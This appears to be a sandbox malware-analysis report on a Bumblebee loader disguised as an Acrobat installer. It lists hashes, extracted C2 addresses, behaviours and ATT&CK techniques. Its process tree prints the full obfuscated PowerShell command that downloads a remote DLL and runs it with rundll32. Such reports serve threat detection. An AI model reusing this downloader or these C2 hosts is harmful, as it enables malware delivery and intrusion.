bumblebee | 18810249d8c67ac8926613e773e1c5e40449be55c595116dce99bb35004de374

General

Target

AcrobatInstaller.hta
Size

96KB
MD5

24432d480bb9d709ab25209a630cb203
SHA1

42a30be9fb069c43ef06fb9acb47909d9dab8cef
SHA256

18810249d8c67ac8926613e773e1c5e40449be55c595116dce99bb35004de374
SHA512

be12606eec050d7c9073c9e36ddbb18b3d69a12dc5823a601b089729640abeeb5e6a7a2ac07131198c468ae96366ef95274409573ebf771a97678d30e049a04a
SSDEEP

1536:v9Q2Ca7Qr8FYoV+iUpQCe9WRhIHt/7YZ1f:v9QTa7Qr8FYc+iUkgYJUnf

Score

10^/10

bumblebee 1011t1 trojan

Malware Config

Extracted

Family

bumblebee

Botnet

1011t1

C2

64.44.135.140:443

103.144.139.150:443

146.70.149.43:443

rc4.plain

Signatures

BumbleBee
BumbleBee is a webshell malware written in C++.
trojan bumblebee

Blocklisted process makes network request 6 IoCs

flow	pid	Process
18	3068	powershell.exe
37	988	rundll32.exe
58	988	rundll32.exe
69	988	rundll32.exe
75	988	rundll32.exe
83	988	rundll32.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	mshta.exe

Loads dropped DLL 2 IoCs

pid	Process
1992	rundll32.exe
988	rundll32.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
988	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3068	powershell.exe
3068	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3068	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1496 wrote to memory of 3068	1496	mshta.exe	79
PID 1496 wrote to memory of 3068	1496	mshta.exe	79
PID 1496 wrote to memory of 3068	1496	mshta.exe	79
PID 3068 wrote to memory of 1992	3068	powershell.exe	83
PID 3068 wrote to memory of 1992	3068	powershell.exe	83
PID 3068 wrote to memory of 1992	3068	powershell.exe	83
PID 1992 wrote to memory of 988	1992	rundll32.exe	84
PID 1992 wrote to memory of 988	1992	rundll32.exe	84

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\AcrobatInstaller.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1496
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function MWG($Fii, $erX){[IO.File]::WriteAllBytes($Fii, $erX)};function LaM($Fii){if($Fii.EndsWith((HQD @(6236,6290,6298,6298))) -eq $True){rundll32.exe $Fii , mruAlloc }elseif($Fii.EndsWith((HQD @(6236,6302,6305,6239))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $Fii}elseif($Fii.EndsWith((HQD @(6236,6299,6305,6295))) -eq $True){misexec /qn /i $Fii}else{Start-Process $Fii}};function NRU($eMW){$QMX = New-Object (HQD @(6268,6291,6306,6236,6277,6291,6288,6257,6298,6295,6291,6300,6306));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$erX = $QMX.DownloadData($eMW);return $erX};function HQD($vfw){$ZTq=6190;$ViK=$Null;foreach($aFd in $vfw){$ViK+=[char]($aFd-$ZTq)};return $ViK};function Xxb(){$Bpm = $env:AppData + '\';;;$WbktydWSz = $Bpm + '1011t1_cr1.dll'; if (Test-Path -Path $WbktydWSz){LaM $WbktydWSz;}Else{ $jPzXrDoPH = NRU (HQD @(6294,6306,6306,6302,6305,6248,6237,6237,6289,6304,6307,6290,6305,6235,6289,6298,6307,6288,6236,6289,6301,6299,6237,6239,6238,6239,6239,6306,6239,6285,6289,6304,6239,6236,6290,6298,6298));MWG $WbktydWSz $jPzXrDoPH;LaM $WbktydWSz;};;}Xxb;
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3068
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll mruAlloc
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1992
  - - C:\Windows\system32\rundll32.exe
      "C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll mruAlloc
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious use of NtCreateThreadExHideFromDebugger
      PID:988

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll

Filesize
830KB

MD5
19f8c4fb6b729f856173beba2b8cfc1d

SHA1
37faae961fa1ca194a2d29a5ac4958e91f0c4c9c

SHA256
ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9

SHA512
4e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308

Download Submit
C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll

Filesize
830KB

MD5
19f8c4fb6b729f856173beba2b8cfc1d

SHA1
37faae961fa1ca194a2d29a5ac4958e91f0c4c9c

SHA256
ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9

SHA512
4e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308

Download Submit
C:\Users\Admin\AppData\Roaming\1011t1_cr1.dll

Filesize
830KB

MD5
19f8c4fb6b729f856173beba2b8cfc1d

SHA1
37faae961fa1ca194a2d29a5ac4958e91f0c4c9c

SHA256
ea96dbb2ffa8cd6ab05a31e55b6452a00784366bb6316dd787acb07e82cae9f9

SHA512
4e5d97f0d0c2f7b8384dffd922e8374c5ffc781b1cf0adf9c08a647982b2eba3c90f248014bbb2d50c8c56940fc06c737e6db388e3df08f5a781495b54e03308

Download Submit
memory/988-151-0x000001BDCDB90000-0x000001BDCDC03000-memory.dmp

Filesize
460KB

Download
memory/988-150-0x000001BDCDB90000-0x000001BDCDC03000-memory.dmp

Filesize
460KB

Download
memory/988-149-0x000001BDCF670000-0x000001BDCF7B9000-memory.dmp

Filesize
1.3MB

Download
memory/3068-137-0x0000000006070000-0x00000000060D6000-memory.dmp

Filesize
408KB

Download
memory/3068-141-0x0000000006C90000-0x0000000006CB2000-memory.dmp

Filesize
136KB

Download
memory/3068-142-0x0000000007DB0000-0x0000000008354000-memory.dmp

Filesize
5.6MB

Download
memory/3068-143-0x00000000089E0000-0x000000000905A000-memory.dmp

Filesize
6.5MB

Download
memory/3068-140-0x0000000006BF0000-0x0000000006C0A000-memory.dmp

Filesize
104KB

Download
memory/3068-139-0x0000000007760000-0x00000000077F6000-memory.dmp

Filesize
600KB

Download
memory/3068-138-0x00000000066D0000-0x00000000066EE000-memory.dmp

Filesize
120KB

Download
memory/3068-136-0x0000000006000000-0x0000000006066000-memory.dmp

Filesize
408KB

Download
memory/3068-135-0x0000000005E60000-0x0000000005E82000-memory.dmp

Filesize
136KB

Download
memory/3068-134-0x0000000005800000-0x0000000005E28000-memory.dmp

Filesize
6.2MB

Download
memory/3068-133-0x0000000005100000-0x0000000005136000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing